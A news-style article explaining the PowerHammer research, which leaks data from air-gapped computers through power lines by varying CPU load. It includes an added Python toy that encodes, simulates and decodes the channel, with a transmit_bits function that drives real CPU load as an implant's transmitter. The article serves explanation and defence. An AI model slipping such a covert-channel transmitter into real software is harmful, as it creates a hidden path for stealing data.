Posted on April 13, 2018 at 4:53 PM
A team of researchers from Israel’s Ben-Gurion University of the Negev, known for their innovative hacks and inventions, has developed a new piece of malware that can extract data from air-gapped computers through the power lines. They named the malware PowerHammer.
PowerHammer does not get itself onto the target; it assumes malware is already running on the air-gapped machine, however it got there. Once running, the malware alters the utilization level of the computer’s CPU, which raises or lowers the amount of electricity the machine draws.
A computer draws current from the mains, and how much it draws at any moment depends largely on how busy the CPU is. By driving CPU utilization up and down on a schedule, the malware controls how much power the machine pulls from the line, producing what the researchers call a “conducted emission” on the power cable. That lets the malware encode binary data as a pattern of power consumption.
Two different types of PowerHammer attacks
To get the data, an attacker first has to tap the electrical network the victim’s computer is plugged into. Only then can they measure the variations in power consumption and decode the data from them.
The method supports two attacks; which one applies depends on where the attacker taps the electrical network.
The first is power-hammering at the line level: the attacker taps the power cable somewhere between the wall socket and the air-gapped device. At this level the researchers reached an extraction rate of 1,000 bits per second.
The second is power-hammering at the phase level, where the power lines are tapped at the building’s electrical phase, which means getting access to the building’s electrical panel. This is more discreet and stealthy, but also much slower: data comes out at only 10 bits per second.
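To make the encoding described above and the decoding at the tap concrete, here is an added example written for this article; it is not the Ben-Gurion team’s code. It assumes a simple on-off scheme (one bit per fixed time slot, CPU busy for a ‘1’, idle for a ‘0’), a fixed preamble so the receiver can find the frame start, and constructed wattage and noise values standing in for a real current-clamp capture. The researchers’ actual modulation and rates are in their paper; the 1 ms bit period used at the end only mirrors the 1,000 bit/s line-level figure quoted here.

```python
"""Toy model of the PowerHammer channel: bits -> CPU load schedule -> power trace -> bits.

Added example for this article, not the researchers' code. Assumptions: on-off keying
(one bit per slot, '1' = CPU busy, '0' = CPU idle), a preamble for synchronisation,
and constructed wattage/noise values in place of a real current-clamp capture.
"""
import random
import time

PREAMBLE = "10101010"   # lets the receiver find the frame start and observe both levels
IDLE_WATTS = 20.0       # constructed baseline draw of the target machine
BUSY_WATTS = 45.0       # constructed draw with the CPU fully loaded


def message_to_bits(text: str) -> str:
    """Frame a message as preamble + 8-bit big-endian bytes."""
    return PREAMBLE + "".join(format(b, "08b") for b in text.encode("utf-8"))


def transmit_bits(bits: str, bit_period_s: float) -> None:
    """What the implant does on the air-gapped host: burn CPU for a '1', sleep for a '0'.

    One thread drives one core; an implant would run one such loop per core to widen
    the current swing (assumption, not a claim about the researchers' implementation).
    """
    for b in bits:
        deadline = time.perf_counter() + bit_period_s
        if b == "1":
            while time.perf_counter() < deadline:
                pass            # busy loop -> higher draw -> conducted emission on the line
        else:
            time.sleep(bit_period_s)


def simulate_power_trace(bits: str, samples_per_bit: int, noise_watts: float, seed: int = 1) -> list:
    """Constructed stand-in for what the probe on the line would sample (Gaussian noise added)."""
    rng = random.Random(seed)
    trace = []
    for b in bits:
        level = BUSY_WATTS if b == "1" else IDLE_WATTS
        trace.extend(level + rng.gauss(0.0, noise_watts) for _ in range(samples_per_bit))
    return trace


def decode_trace(trace: list, samples_per_bit: int) -> str:
    """Receiver side: average each bit slot and threshold at the midpoint of the observed range.

    The preamble guarantees both levels appear, so min/max gives a usable threshold
    without knowing the target's idle and busy wattage in advance.
    """
    threshold = (min(trace) + max(trace)) / 2.0
    bits = []
    for i in range(0, len(trace) - samples_per_bit + 1, samples_per_bit):
        slot = trace[i:i + samples_per_bit]
        bits.append("1" if sum(slot) / len(slot) > threshold else "0")
    return "".join(bits)


def bits_to_message(bits: str) -> str:
    """Locate the preamble, then regroup the payload into bytes."""
    start = bits.find(PREAMBLE)
    if start < 0:
        raise ValueError("preamble not found in decoded bits")
    payload = bits[start + len(PREAMBLE):]
    payload = payload[: len(payload) - len(payload) % 8]      # drop a trailing partial byte
    return bytes(int(payload[i:i + 8], 2) for i in range(0, len(payload), 8)).decode("utf-8", errors="replace")


def exfiltrate_and_recover(text: str, samples_per_bit: int = 10, noise_watts: float = 2.0) -> str:
    """End-to-end run through the simulated channel (no real CPU load is generated here)."""
    bits = message_to_bits(text)
    trace = simulate_power_trace(bits, samples_per_bit, noise_watts)
    return bits_to_message(decode_trace(trace, samples_per_bit))


if __name__ == "__main__":
    print(exfiltrate_and_recover("Hi"))                        # prints Hi
    # Actually load this machine's CPU for ~24 ms at the 1 ms bit period of the 1,000 bit/s case.
    transmit_bits(message_to_bits("Hi"), bit_period_s=0.001)
```

Averaging every sample in a slot is what makes the slow phase-level case workable: a longer slot means more samples to average and so more noise tolerated, which is the trade-off behind the 10 bit/s figure. The `transmit_bits` call is the only part that touches real hardware; everything else runs offline.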
The attacker only needs standard electrical equipment
To tap the victim’s electrical network the attacker does not need advanced equipment. A regular split-core current transformer, a clamp that closes around a power cable without cutting it, works on almost any electrical line. This probe can also send the captured data over WiFi to a computer stashed nearby, so collection can be done from a distance and the attacker does not have to stay physically connected to the probe.
The researchers found that the method works on laptops, desktops, servers and IoT devices; an air gap does not stop it. IoT devices are the hard case because the extraction rate is even slower there, though the rate improves when the malware can load more CPU cores.
More details are in the team’s paper. It is worth noting that the malware was built for research purposes only; using this method to steal data in a real attack takes the kind of physical access and resources that intelligence agencies have rather than ordinary criminals, so it is not something normal users are likely to face.